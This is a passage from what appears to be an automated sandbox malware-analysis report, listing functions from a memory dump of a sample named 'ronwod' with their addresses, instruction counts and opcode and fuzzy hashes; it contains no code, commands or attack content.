Function 0145DDC0 Relevance: .3, Instructions: 307COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a08d7db4c5c022387ac776762bdb3d98d36c2ebedaf120b143303b2a1d7dc303
Instruction ID: 0c8f8d46012128cfc4d71e4b021f01f5fe6a9565e0a29ed3e0718a310917694d
Opcode Fuzzy Hash: a08d7db4c5c022387ac776762bdb3d98d36c2ebedaf120b143303b2a1d7dc303
Instruction Fuzzy Hash: 45A1E933B59A910BC75C9D7C4C112AEB9830FD6630B2DC33EA9B58B3E6D9758D024351

Function 0147F450 Relevance: .3, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 33d802fbd42766a53bbb29110a461bf088c9d21c6e830f2f29b0fa2ff51a9f8c
Instruction ID: e98d6d33b42b4a9c6d90449b08fe910829bdd06512c686919b0303f2bd76072e
Opcode Fuzzy Hash: 33d802fbd42766a53bbb29110a461bf088c9d21c6e830f2f29b0fa2ff51a9f8c
Instruction Fuzzy Hash: 2C91C2792082119BD724DF2CC9909AFB7E1FF98710F15852DE9998B371EB31E815C781

Function 014461B0 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 192b9d08ce17bc1d312091997c30b37e60dce660e4c0c653e6da0c20b7bf1f23
Instruction ID: 565de747de5dfa670afad006f5c1bf8b4ac0173b73f68b215cb124f3725b6554
Opcode Fuzzy Hash: 192b9d08ce17bc1d312091997c30b37e60dce660e4c0c653e6da0c20b7bf1f23
Instruction Fuzzy Hash: 9DC18DB29087418FD320CF68DC867ABBBE1BF85318F09492DD1D9C6342E778A155CB46

Function 0144B262 Relevance: .3, Instructions: 297COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 122d793836674790e435062b7efd319ab2b6d8272070f9be2782e1ab0b1eac84
Instruction ID: f5937de5edd59ad0eff2f3b7ebc58ab8c0b3530fc34682dbaaedc6d535697578
Opcode Fuzzy Hash: 122d793836674790e435062b7efd319ab2b6d8272070f9be2782e1ab0b1eac84
Instruction Fuzzy Hash: C9A16A72210B02CFD7348F29E885B6BB7F5FB88318F05892DE95A976A4D734E815CB50

Function 01486FB1 Relevance: .3, Instructions: 291COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 244b3aa9d13be7976943ad713e2a51fb46775a20c58cbf54f4301d9c24bf6cdb
Instruction ID: d68668558ef6e294eb36d600962e718a9e37c5d83f2ce67f90cd6bc7afc5dfce
Opcode Fuzzy Hash: 244b3aa9d13be7976943ad713e2a51fb46775a20c58cbf54f4301d9c24bf6cdb
Instruction Fuzzy Hash: 6F9170B0A587829BC7988E2884653F8B3A5FFC322D317526EC5C759961D2325CE3CF81

Function 0146F5D9 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c567df54b62aa76de0e8f901ac45f504fe02c8b62848d0560f58901caf4852e
Instruction ID: 35da4850028e09b36fba8bf4a942eaa4dedda7ca0caabb19d067d6e145d74a4a
Opcode Fuzzy Hash: 2c567df54b62aa76de0e8f901ac45f504fe02c8b62848d0560f58901caf4852e
Instruction Fuzzy Hash: 96B11972604F408BD328DF39D8512A7BBE2AFE4314F088A3DC4DB87795E678A449C742

Function 01467551 Relevance: .3, Instructions: 282COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c9792280717fd6ed23da0335c14a65e6d1f762c863c5f245ef8b04398182dad
Instruction ID: 2dc774152f7db42cb8cf2964d4ad092b2c99801e88cde83115bd004e865efaee
Opcode Fuzzy Hash: 6c9792280717fd6ed23da0335c14a65e6d1f762c863c5f245ef8b04398182dad
Instruction Fuzzy Hash: 45A13A31A08382CFD324CF38D89036EBBE2AF85329F1A866DE5A5472F5D3319945CB51

Function 0146BD77 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b22160b4ad728c2903db4d2e03f0de1c613d2cb642488e53289ae47b02fe90d4
Instruction ID: df209afcac902db7e1214eea82760d0f98fb7b260de1c242c6f978394a8b200e
Opcode Fuzzy Hash: b22160b4ad728c2903db4d2e03f0de1c613d2cb642488e53289ae47b02fe90d4
Instruction Fuzzy Hash: 9D714BB26083918BD3198F29C46037BBBD1DFD2708F28896EE5D5DB371D67988018B42

Function 0147F150 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b5fb836a52b43b709789b3c90e027176c9318caceadaaebb02621cbf68191856
Instruction ID: a1783f5196375cd7bd4e045d6c434e61dbd7f1ae33761dd235242cd6671c941f
Opcode Fuzzy Hash: b5fb836a52b43b709789b3c90e027176c9318caceadaaebb02621cbf68191856
Instruction Fuzzy Hash: 098137366042119BDB249F1CC940ABFB7A2FFD4720F0A853DE9959B375EB30A855C381

Function 01477960 Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1e666837c13befc05dbcfbbc78e94ad159617305b2e724d8416882983b6440d
Instruction ID: db0836c4327f908cbc57f26f81af319b358d6028adac60dec57e05209a274c19
Opcode Fuzzy Hash: e1e666837c13befc05dbcfbbc78e94ad159617305b2e724d8416882983b6440d
Instruction Fuzzy Hash: 8AA11232A042148FEB00CFBCC9852FE7BF2EF88315F59852ED546973A5D6798946CB81

Function 0146BE3B Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa38a1a57aa861ae1dfe80298ec16fad9b0ca364b3962cc8ada39bb05e03cddb
Instruction ID: 7687ab959caa3a644fdeae88b6844e3d2570ef04bf45b3e3844532142259ebc5
Opcode Fuzzy Hash: aa38a1a57aa861ae1dfe80298ec16fad9b0ca364b3962cc8ada39bb05e03cddb
Instruction Fuzzy Hash: CD7149B16083918BE3198F39C46137BBBD1DFD2708F28896EE5D6DB3A1D6798405CB42

Function 0146BE9D Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a443f1161225d5fdf28c16c9c7080f101237bedc8126d4c6d7605686292ac92
Instruction ID: 66cf58c3f4790d68f68f348726d2555c7689c4e386b05eca8606dc90266a147e
Opcode Fuzzy Hash: 2a443f1161225d5fdf28c16c9c7080f101237bedc8126d4c6d7605686292ac92
Instruction Fuzzy Hash: 23615BB26183918BE3188F39C4A137BBBD1DFD2708F28886DE5D5DB3A1D6798405CB42

Function 0145C119 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df79f06fbfac4a0258b62ea737f36e76bbbcbfbe46109246d3892e3b8abda04c
Instruction ID: 9b6774b1f30fbbbd68eb41cddbf344f76749a081081b37f9b594baa06c4df5d6
Opcode Fuzzy Hash: df79f06fbfac4a0258b62ea737f36e76bbbcbfbe46109246d3892e3b8abda04c
Instruction Fuzzy Hash: C681AEB0910B009FC324EF39C942127BBF1FF56300B548A1EE8D68B7A5E335A456CB96

Function 014564A3 Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4e8ff4eb34626c4c5eb164777f10e2d25af21a9f202d3f96fe195e90a3ef82c1
Instruction ID: 70488c834b64c476add2c3794d6a75271c2f1cb62f57d0ced00b8b0945a4bce4
Opcode Fuzzy Hash: 4e8ff4eb34626c4c5eb164777f10e2d25af21a9f202d3f96fe195e90a3ef82c1
Instruction Fuzzy Hash: F481F2352187019BE760CF2CD84076FBBE2BFD8714F56482DE98AC7366D77198918B81

Function 0145717B Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3ecdf1170bfb171a1aad3f5699268d3f7d60c90d16e8663bd9edaada0b386b6e
Instruction ID: f4044032628508a2fe7af17c81b35acfd79b1cad0bfa8e4323e7433295197c5f
Opcode Fuzzy Hash: 3ecdf1170bfb171a1aad3f5699268d3f7d60c90d16e8663bd9edaada0b386b6e
Instruction Fuzzy Hash: B371D0352187019BE764CF2CC88077EBAE2AFD8715F96443DE98AC7362D77198918782

Function 01467C29 Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 635a5c82738e93e140d14dad3868695b476ba569863aeb08a8d053fafc1c8461
Instruction ID: 1346d429014e34d6abee4bc71cf187a65be61ed5029d50e27b4b84f40e678dd3
Opcode Fuzzy Hash: 635a5c82738e93e140d14dad3868695b476ba569863aeb08a8d053fafc1c8461
Instruction Fuzzy Hash: 8771F772B147018FD718CE2DD85022EB7D3ABD9215F5A8A3DD95ACB396DB34D802C741

Function 0146BE86 Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd3c369ac3ca6bec4450d6858b48b2af7db9175dbb94ec14f747299cb754547b
Instruction ID: 476ad9a83aad9343967a4805ebb361dd198bb305d199e8b4b599d970cb824800
Opcode Fuzzy Hash: cd3c369ac3ca6bec4450d6858b48b2af7db9175dbb94ec14f747299cb754547b
Instruction Fuzzy Hash: C9513AB2A183918BE3198F39C4A137BBBD1DFD2708F28886DE5D59B361D2798405CF52

Function 0147B1D0 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f9e9cfdb87b6cb477f903c407bcdf123f3b239eb07f9fddab19c514789e823c2
Instruction ID: 724681d69ba25fa660121436811bde1f993b3e5e285e9ee1534b49227e91ad3b
Opcode Fuzzy Hash: f9e9cfdb87b6cb477f903c407bcdf123f3b239eb07f9fddab19c514789e823c2
Instruction Fuzzy Hash: 11512435A083189BE720AF29C9447AFB7A2FBD4B04F15843ED9889B371E6716C518781

Function 01470470 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2a02dec78e17ae6df6e2e5b1f8e290c5d984e07ff6908ddd04b275d7c4e8e72
Instruction ID: 22695cbb19ded0cc7ce5ef99d90255c4131523de389e0a4a5795d9c0c04a2ef8
Opcode Fuzzy Hash: a2a02dec78e17ae6df6e2e5b1f8e290c5d984e07ff6908ddd04b275d7c4e8e72
Instruction Fuzzy Hash: 6271F62674A6D14BC329593C48313FEAA834FD7230F2D836EB6F68B3F1D96598028351

Function 0147B650 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 43ceefba95bf5d0f026bae127050b741dcd16b9d8a7dd0cc4b4f1b5b1534e0cb
Instruction ID: 362ea8c43eb87feda8812812681a4b88c5512f29ed42bd0180b26dafcf710236
Opcode Fuzzy Hash: 43ceefba95bf5d0f026bae127050b741dcd16b9d8a7dd0cc4b4f1b5b1534e0cb
Instruction Fuzzy Hash: 1451B2319042119FDB209F2DC8805AFB7A6FFC4714F1A892EDA849B375D731A851CBC1

Function 0146DEF1 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 522fdd3b2b4e3e85441d77b9dacf0c19ffb8c7e057b9df3b8a5a866bf8f2411f
Instruction ID: b046afe768886b906e1beb60c488f84374cfe86443215c24a37c90bfacae8e24
Opcode Fuzzy Hash: 522fdd3b2b4e3e85441d77b9dacf0c19ffb8c7e057b9df3b8a5a866bf8f2411f
Instruction Fuzzy Hash: B1810572715B408BC3289F7DD8912ABBBE2AFD4314F19893ED4EAC7395E934A405C706

Function 0145138A Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50d006d78b9628c0ac8835ca32d828d10cd6ec3d97d58957cdaa10736f51c4f9
Instruction ID: d483f9d0ea9a4cc6c8e39e71822f3aa60964678c5f379d2d0433e672391bd02a
Opcode Fuzzy Hash: 50d006d78b9628c0ac8835ca32d828d10cd6ec3d97d58957cdaa10736f51c4f9
Instruction Fuzzy Hash: 0581A6726187418BD3189F39C4513AEB7E1AF98764F094B2FE9EAC73E1DB3485418742

Function 0145ADD0 Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91e97bdbd546bed6a224cb49ee427f460ada3d4e93977fc8254c41a520265360
Instruction ID: cdc513504339dbbff6909bc712996cb351c1070db3c7a0685e467590780f60e7
Opcode Fuzzy Hash: 91e97bdbd546bed6a224cb49ee427f460ada3d4e93977fc8254c41a520265360
Instruction Fuzzy Hash: 2A610B33B159914BC76C8D7C9C612BDAA535BD6230B2E836EED718B3E6C6754C0283A0

Function 01471E50 Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7411e235dc4aa65e4c427a280deaa815e35484e90fafc261100ae6c3ff9ce77
Instruction ID: 996d52cd9e52fc0888e6bd7695848aa4380131ba38b21c6027ef6368ea6d1335
Opcode Fuzzy Hash: a7411e235dc4aa65e4c427a280deaa815e35484e90fafc261100ae6c3ff9ce77
Instruction Fuzzy Hash: C0610A32F159914BC7298D3C5C612FE7A535B9663072DC36EEAB29B3F9C275480683A0

Function 0144C621 Relevance: .2, Instructions: 199COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25f8cf44181d9f731dfe5cc05498cae68bb4d8e8e648d0051dc78d93c3dd5202
Instruction ID: 8273f012de28ebfa857bdb29822a1a6023572905899297e19a3de218056b6214
Opcode Fuzzy Hash: 25f8cf44181d9f731dfe5cc05498cae68bb4d8e8e648d0051dc78d93c3dd5202
Instruction Fuzzy Hash: 08511873A942214BE318CF64CC807ABB6E3EBC4300F1A943DED89A7794EA7999055785

Function 014720B0 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 911a7dd6495e18e256732556777a3b14570918f116237dff3071cbf871fc373a
Instruction ID: 18f3cbc538c254afb2bc3dc483f634acc640956309972bdf032fbc74ed02d1f3
Opcode Fuzzy Hash: 911a7dd6495e18e256732556777a3b14570918f116237dff3071cbf871fc373a
Instruction Fuzzy Hash: 43513637B5999147972CC93D5C127AA7A830FD3230B2DC76EA5B1CB3F5C5B588068350

Function 0145C3F4 Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38b6e35d231150894ddc9903a190a9d99de00d50b105ad9bbeed18d36965f0f2
Instruction ID: a9cb3d24b922005b757ad2ad8d523f9402da71c779a7bf5960fa84812061dcd7
Opcode Fuzzy Hash: 38b6e35d231150894ddc9903a190a9d99de00d50b105ad9bbeed18d36965f0f2
Instruction Fuzzy Hash: E65117B05107219BD724CF2DC881233BBF2FFA6304754866DD8968B765E33AE452CB95

Function 01477170 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a456be5166b92ab10874784492d9a7357f7a85283333ec6aeb1257d6c9849aa
Instruction ID: 24050156c19e4439ad3bc45daf2a7b74f9128d84edb38b90f71fe195965fc8be
Opcode Fuzzy Hash: 9a456be5166b92ab10874784492d9a7357f7a85283333ec6aeb1257d6c9849aa
Instruction Fuzzy Hash: 8F515CB16087548FE314DF69D89475BBBE1BBC4318F444A2EE5E987350E379D6088F82

Function 0146CC5D Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 225afb52dc5b3683c07b135806627ac6d02492ca4d41e905ab077a1d0866f29a
Instruction ID: bcbd0088f65c2ccd81309ce499b152d837ff42f6a1c0427162b76bbff1acafca
Opcode Fuzzy Hash: 225afb52dc5b3683c07b135806627ac6d02492ca4d41e905ab077a1d0866f29a
Instruction Fuzzy Hash: 0351D032999B934BE7158A28C8D01A7BF86DF96255F0CC73AC9D5473D6D3389406C392

Function 0146B00F Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6dd72fb7e5eff772b6a56e62e81fe149117d7777722f782c4e5649446455cec
Instruction ID: 434fbc1454583dcced184404375a48519ffa3fce494043269662ba8b4be8da5d
Opcode Fuzzy Hash: a6dd72fb7e5eff772b6a56e62e81fe149117d7777722f782c4e5649446455cec
Instruction Fuzzy Hash: 92416E61B54267DBE714892888512F6BB95EB15395F0C823BC555C73A1E338DC0AD3D3

Function 0146F211 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11f009e651c4c0fb47bf61630896671aba7ccb319d54c4f09146503f599f1809
Instruction ID: 4b47c073cda42827686e21f905346799fc6d73898ac7bfd95fea177c3b85d218
Opcode Fuzzy Hash: 11f009e651c4c0fb47bf61630896671aba7ccb319d54c4f09146503f599f1809
Instruction Fuzzy Hash: 5A51A432715B418BD368CF39C991297BBE2AF99320F19CA3DD4AAC77E4D638A4018711

Function 014804D0 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 77f80a99dd52004b2dc2f1902d12e567f4e456e5303953e6ba37a2aea3270c7e
Instruction ID: 266913911483e644aafe78a6ee42283d5e061898a0fc0213a12d76a87a62389c
Opcode Fuzzy Hash: 77f80a99dd52004b2dc2f1902d12e567f4e456e5303953e6ba37a2aea3270c7e
Instruction Fuzzy Hash: B94147342643019FE724AE5CDD80BBFB7A6EBC4718F28542DF289973B0D671A4558314

Function 01480650 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34b82ac84fa44314e51605ac11cce9d126a6c05e09bdbffd56b20f8933749b74
Instruction ID: 4ac7b6a5095b5ed49895d2e6b5a6a454a5e48264c00a611f48f04917f0bc422f
Opcode Fuzzy Hash: 34b82ac84fa44314e51605ac11cce9d126a6c05e09bdbffd56b20f8933749b74
Instruction Fuzzy Hash: 814158383643019FE724AE18DD81B7FB7A6EBC4718F28453DF688973B0DA71A8548B05

Function 01464CCD Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d5abbf9f9c2c832d7da3dd5c5cd5233f5ac190ba2ca37af441ea3af55f1ecf0
Instruction ID: eb363afe2f91b9ca412c8b99d6ad1480683d32b9ffc75825ba13997629983010
Opcode Fuzzy Hash: 5d5abbf9f9c2c832d7da3dd5c5cd5233f5ac190ba2ca37af441ea3af55f1ecf0
Instruction Fuzzy Hash: D24135B5E10121DBDB68CF28D9406AEB3F2FF99300F199579C845E336ADB345910CB80

Function 0147DE19 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa20f80e1b78b82a3c479fd7b202190155d64a6923f20af68cd6bfec47243e67
Instruction ID: 4b1a2f894b2768a730f8c16169073faaaddc69507de7573c895dcb18ff0475ac
Opcode Fuzzy Hash: fa20f80e1b78b82a3c479fd7b202190155d64a6923f20af68cd6bfec47243e67
Instruction Fuzzy Hash: 4031D633E105254BE719CE7DC8617DBB7A3AFC8210F1A817ADC69DB3A9DA7059014680

Function 0147B450 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0089cdaeccd379fc8eaddd11567e77e5f0ee9e64474a4091e2745f4b009d6ad
Instruction ID: 71cd2db511bac026c1801742869443a66a0d06af418e7ce817713ef946f05eb1
Opcode Fuzzy Hash: d0089cdaeccd379fc8eaddd11567e77e5f0ee9e64474a4091e2745f4b009d6ad
Instruction Fuzzy Hash: 0031D272A092149FE710CF19C9447ABB7E9EFC8718F05882DD988AB361D3729846CBD5

Function 0147DC5E Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99a1cf2d8d9255513ef5bf7da4353bed9432ac87a209987a008b6085c311612c
Instruction ID: 02adc271a3555c719386b501f1f6ba212c8696f6acf9e352aa2ee5783b1bb565
Opcode Fuzzy Hash: 99a1cf2d8d9255513ef5bf7da4353bed9432ac87a209987a008b6085c311612c
Instruction Fuzzy Hash: C1313572F502258BDB2CCEACCC523FFB6A2AB89304F08512ED946E7391CA7859018790

Function 01478E40 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

